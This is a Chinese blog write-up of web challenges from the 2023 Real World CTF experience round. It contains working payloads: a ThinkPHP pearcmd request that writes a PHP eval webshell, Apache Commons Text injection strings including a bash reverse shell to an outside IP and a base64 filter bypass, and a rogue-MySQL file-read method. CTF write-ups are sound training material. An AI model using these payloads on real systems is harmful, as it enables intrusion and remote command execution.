2023 Real World CTF体验赛部分Writeup

最新推荐文章于 2023-11-01 10:38:29 发布
最新推荐文章于 2023-11-01 10:38:29 发布
阅读量2.9k 收藏 2
点赞数 2
分类专栏: CTF_Writeup_[web] web安全 文章标签: php 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/128595268
版权

web1

在这里插入图片描述
Thinkphp lang多语言 RCE漏洞,直接打

GET /index.php?+config-create+/<?=eval($_REQUEST[1]);?>+/tmp/keep.php HTTP/1.1
Host: 47.98.124.175:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_lang=zh-cn
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

GET /index.php?1=system('ls+/'); HTTP/1.1
Host: 47.98.124.175:8080
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 2
think-lang:../../../../../../../../tmp/keep
Cookie: think_lang=zh-cn;
Connection: close

在这里插入图片描述
在这里插入图片描述

rwctf{PHP_1s_Th3_B3st_L@ngvag3_1n_the_w0r1d}

web2

是一个MySQL连接框
在这里插入图片描述

利用场景:

  1. 利用重装漏洞,读取目标服务器上的任意文件
  2. 利用目标的数据迁移等,能连接外部数据库的功能点,读取目标服务器上的任意文件
  3. 搭建在蜜罐上读取攻击者的信息,蓝队溯源/反制
    攻击流程:
  4. 受害者向攻击者提供的服务器发起请求,并尝试进行身份认证
  5. 攻击者的MySQL接受到受害者的连接请求,攻击者发送正常的问候、身份验证正确,并且向受害者的MySQL客户端请求文件。
  6. 受害者的MySQL客户端认为身份验证正确,执行攻击者的发来的请求,通过LOAD DATA INLINE 功能将文件内容发送回攻击者的MySQL服务器。
  7. 攻击者收到受害者服务器上的信息,读取文件成功,攻击完成。
    使用项目:https://github.com/rmb122/rogue_mysql_server
    修改项目配置文件,修改读取内容为/flag:
    在这里插入图片描述

监听Mysql服务:
在这里插入图片描述

提交所监听的地址和端口,以及用户信息
在这里插入图片描述

在这里插入图片描述
获取读取flag文件结果
在这里插入图片描述
rwctf{d041bd251adb4380b3e1dea2bd355f8f}

Web3

在这里插入图片描述

CVE-2022-42889,apache common textshell
尝试进行利用,发现过滤了常用的file script url dns
在这里插入图片描述

可以通过base64Decoder绕过
在这里插入图片描述
在这里插入图片描述

尝试通过base64编码绕过后,进行反弹shell

${script:javascript:java.lang.Runtime.getRuntime().exec("bash -c 'exec bash -i &>/dev/tcp/111.111.111.111/54321 <&1'")}

但是并没有成功,后面通过构造输入输出流去读取执行./readflag,得出flag

${script:javascript:new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("./readflag").getInputStream())).readLine()}

在这里插入图片描述

${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpuZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcihuZXcgamF2YS5pby5JbnB1dFN0cmVhbVJlYWRlcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiLi9yZWFkZmxhZyIpLmdldElucHV0U3RyZWFtKCkpKS5yZWFkTGluZSgpfQ==}

在这里插入图片描述

rwctf{rwctf_1terat1on_1s_4_g0od_des1gN_e5aa}

Web4

在这里插入图片描述

YApi 接口管理平台 up SQL注入漏洞,尝试通过NoSQL注入直接RCE
在这里插入图片描述
获取权限,尝试获取flag
在这里插入图片描述
在这里插入图片描述
rwctf{y0u_h4ve_f0und_yvmmy_@pi_f0r_c1ph3r_ch4ll3ng3s}

Web5

在这里插入图片描述
CVE-2022-26134 Atlassian Confluence远程代码执行漏洞,之前复现过,直接通过之前写的脚本getshell
在这里插入图片描述

rwctf{154fea37c0f14b519942931db23e89e8}

keepb1ue
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透系列(实战):YApi 接口管理平台 后台任意命令执行漏洞、蓝海卓越计费管理系统 debug.php 远程命令执行漏洞、畅捷CRM 后台附件任意文件上传漏洞和get_usedspace.php
weixin_54626591的博客
12-07 968
YApi 接口管理平台 后台任意命令执行漏洞、蓝海卓越计费管理系统 debug.php 远程命令执行漏洞、畅捷CRM 后台附件任意文件上传漏洞和get_usedspace.php SQL注入漏洞
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
【漏洞复现】Yapi接口管理平台RCE漏洞汇总
做自己喜欢的事,并将其发挥到极致!
01-10 4680
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。
yapi token注入漏洞
whoami
11-21 1943
YApi 是一个可本地部署的可视化的接口管理平台。YApi 在 1.11.0 之前的版本中存在远程代码执行漏洞,因为 base.js 没有正确对 token 参数进行正确过滤,攻击者可通过 MongoDB 注入获取用户 token(包括用户 ID、项目 ID 等),进而使用自动化测试 API 接口写入待命命令,利用沙箱逃逸触发命令执行。
2023第五届 Real World CTF 体验 Writeup(web)
一只爱吃橙子的羊
01-12 2353
2023第五届 Real World CTF 体验 Writeup(web)
YApi接口管理平台远程代码执行漏洞复现
qq_44484541的博客
11-01 299
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台。
自己ctf比赛writeup.zip
10-01
比赛项目源码
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
CTF比赛收集的题和writeup.zip
09-30
比赛项目源码
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
[GDOUCTF 2023] ——web方向全Write up
Leaf_initial的博客
04-17 1980
魔术方法,然后可以看到__wakeup()中会指向classroom类的hahaha函数,hahaha所需要的变量条件在school类的。把`’ [] " _ {{}} \ .都过滤了但是比较幸运的是可以用{%%},看了看他的config和self,发现都可以用。test.txt也看过了,里面和/orzorz.php中的内容一样,不过是文档形式,这里不赘述。可以看出这个通过flask框架写的一个网页,通过代码审计我们可以得知,只需要向。所以,双等号是不要求类型相同的,所以我们可以构造payload。
2023 Real World CTF 体验 --- wp
3tefanie丶zhou的博客
01-09 808
【他乡纵有当头月,不抵故乡一盏灯,年关将至,外乡人都早些回家】
NKCTF 2023 Writeup By AheadSec
末初的CSDN博客
03-27 2587
NKCTF 2023 Writeup By AheadSec 战队的各位师傅辛苦啦~
CTF WriteUp】2023数字中国创新大网络数据安全道决WP(1)
cccchhhh6819的博客
04-27 2969
不多说了,还是菜,各种不会,还得学。
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1332
钝角
[SICTF2023] Misc 高质量 WriteUp
qq_47875210的博客
01-19 2759
这道题目很早就出来了,但是一直没师傅做,我也不知道为嘛,那个时候没进比赛群,然后我就说我来试试,然后遇到了题目的出错的问题。注意:这个题目他用了一个randit(0, 2),这个函数就会导致可能是在B通道,可能是在G通道,或者是在R通道,也就是说0的时候是B通道,1的时候是G通道,2的时候是R通道,因为cv2读取图片后就是BGR的通道顺序。这个题目不知道怎么评价,因为他的出题的那个脚本,我把逆代码写出来后还是得不到清楚的图片,因为我已经做出来了,就找树木反应,树木给了正确解题代码,然后拿到正确解题代码。
CTF WriteUp】2023数字中国创新大网络数据安全道决WP(2)
cccchhhh6819的博客
04-27 2244
菜的要死,各种不会,答案也不全,凑合吧。
安洵杯SYCCTF2023 writeup
渗透测试研究中心
06-13 1496
一、MISC 1.sudoku_easy 简单的数独交互,几个小注意点,每次发送level之后sleep5秒才会返回题目 将形如 --------------------- 800103720 023840650 410006008 300001062 000052407 072060090 160000375 205019846 000030000 ------------------...
2023LaCTFWriteup
Amherstieae的博客
02-15 599
2023LaCTFWriteup
ctf 解题 题状态
最新发布
04-25
CTF(Capture The Flag)解题是一种网络安全,旨在考察参者在网络安全领域的知识和技能。在比赛中,参者需要通过解决一系列的题来获取旗帜(Flag),并提交给题平台进行验证。题的类型多种多样,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值